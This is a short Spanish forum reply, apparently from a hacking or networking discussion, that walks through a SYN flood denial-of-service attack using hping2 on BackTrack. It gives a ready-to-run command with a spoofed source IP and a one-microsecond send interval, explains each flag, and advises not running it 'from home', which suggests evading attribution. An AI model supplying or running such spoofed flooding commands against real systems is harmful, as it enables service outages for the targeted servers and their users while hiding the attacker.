Perdón por el dobleposteo.
Por si te sigue interesando, el otro día lo probamos en red interna.
Un ataque SYN FLOOD en backtrack (imagino que con kali linux es similar), desde una consola:
hping2 192.168.0.50 -S -p 80 -a 192.168.0.10 -i u1
192.168.0.50: ip del que recibe el ataque, puedes poner también el nombre.
-S indica que va a ser un ataque SYN
-p el puerto
-a una IP diferente a la nuestra para que no nos mande info y lo spoofee
-i u1 se refiere a cada milisegundo
Hay más comandos que los puedes mirar con la ayuda, si lo haces infórmate más y no lo hagas desde tu casa.
Este ataque no satura la red, lo que hace es mandar muchos recursos que los consigue del servidor debido a que al enviar muchos SYN este se llena.